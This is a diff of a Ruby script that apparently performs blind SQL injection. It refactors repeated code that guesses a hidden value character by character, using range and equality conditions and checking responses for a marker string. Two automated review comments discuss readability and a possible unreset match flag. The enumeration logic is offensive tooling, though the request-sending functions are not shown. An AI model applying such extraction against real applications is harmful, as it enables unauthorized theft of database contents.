"y" if v.to_s.include?($search) - } + cbetween("T", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break 
end end else for ch in $arr16 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end 
@@ -1065,72 +722,22 @@ def send2ndreq() end # numeric - if found == 0 - if $hex == "y" - configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "9".unpack('H*')[0]) - else - configreq("between" + $oh + "0" + $oh + "and" + $oh + "9") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $letter == 0 + cbetween("0", "9", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "4".unpack('H*')[0]) - else - configreq("between" + $oh + "0" + $oh + "and" + $oh + "4") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("0", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arrn2 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if 
$response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end @@ -1138,25 +745,11 @@ def send2ndreq() end # special character - if found == 0 + if $letter == 0 for ch in $arrs - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end 
@@ -1164,278 +757,78 @@ def send2ndreq() elsif $mode == "a" # lowercase - if $hex == "y" - configreq(">=" + " 0x" + "a".unpack('H*')[0]) - else - configreq(">=" + $oh + "a") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless(">=", "a", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "m".unpack('H*')[0]) - else - configreq("<=" + $oh + "m") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "m", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "f".unpack('H*')[0]) - else - configreq("<=" + $oh + "f") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "f", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "c".unpack('H*')[0]) - else - configreq("<=" + $oh + "c") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts 
"Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr2 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "i".unpack('H*')[0]) - else - configreq("<=" + $oh + "i") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr4 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") 
+ if $letter == 1 break end end end end else - if $hex == "y" - configreq("<=" + " 0x" + "s".unpack('H*')[0]) - else - configreq("<=" + $oh + "s") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "s", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "p".unpack('H*')[0]) - else - configreq("<=" + $oh + "p") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr6 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "v".unpack('H*')[0]) - else - configreq("<=" + $oh + "v") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader 
= "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr8 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end 
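Review bot: The pivot letters (`"m"`, `"f"`, `"c"`, `"i"`, `"s"`, `"p"`, `"v"`) and the arrays `$arr1`…`$arr8` are tied together only by their position in the nested `if`/`else`, and nothing on the new side says which range each array is expected to hold. The array definitions are outside this hunk, so whether they match the pivots cannot be checked here; presumably `$arr1` is a–c and `$arr2` is d–f. A one-line comment on each leaf, for example `# a..c: reached after >= a, <= m, <= f, <= c` above `for ch in $arr1`, would make a mismatch between a pivot and its array visible in review. The uppercase hunk that follows has the same tree with `$arr9`…`$arr16` and would need the same comments.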
@@ -1445,279 +838,79 @@ def send2ndreq() end # uppercase - only when case-sensitive specified - if $case == "y" && found == 0 - if $hex == "y" - configreq(">=" + " 0x" + "A".unpack('H*')[0]) - else - configreq(">=" + $oh + "A") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $case == "y" && $letter == 0 + cmoreless(">=", "A", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "M".unpack('H*')[0]) - else - configreq("<=" + $oh + "M") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "M", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "F".unpack('H*')[0]) - else - configreq("<=" + $oh + "F") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "F", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "C".unpack('H*')[0]) - else - configreq("<=" + $oh + "C") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if 
$response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr10 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "I".unpack('H*')[0]) - else - configreq("<=" + $oh + "I") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr12 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + 
ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end end else - if $hex == "y" - configreq("<=" + " 0x" + "S".unpack('H*')[0]) - else - configreq("<=" + $oh + "S") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "S", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "P".unpack('H*')[0]) - else - configreq("<=" + $oh + "P") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr14 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "V".unpack('H*')[0]) - else - 
configreq("<=" + $oh + "V") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr16 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end 
@@ -1728,71 +921,21 @@ def send2ndreq() end # numeric - if found == 0 - if $hex == "y" - configreq(">=" + " 0x" + "0".unpack('H*')[0]) - else - configreq(">=" + $oh + "0") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $letter == 0 + cmoreless(">=", "0", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "4".unpack('H*')[0]) - else - configreq("<=" + $oh + "4") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arrn2 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end 
@@ -1801,32 +944,18 @@ def send2ndreq() end # special character - if found == 0 + if $letter == 0 for ch in $arrs - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cmoreless("=", ch, "yes") + if $letter == 1 + break end end end end # printing results - if found == 0 + if $letter == 0 if $result == "" puts "No results. Probably wrong pattern." break @@ -1838,7 +967,6 @@ def send2ndreq() end # means that there are still chars to enumerate -if found == 1 +if $letter == 1 puts "\nRetreving not finished:\n" + $result end -
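Review bot: `$letter` replaces `found` as the per-position match flag, but this hunk only reads it (`if $letter == 0`, `if $letter == 1`); the writes now have to happen in `cbetween`/`cmoreless` and in a reset at the top of the enumeration loop, neither of which is visible here. If that reset is missing, a `1` left over from the previous position would skip every branch guarded by `$letter == 0`, including the "printing results" check that ends the loop. It is worth confirming that the loop starts with `$letter = 0` and marking it with a comment such as `# reset per position; the compare helpers set it to 1 on a match`. The `if $letter == 1` after the loop in the last hunk reads the same global.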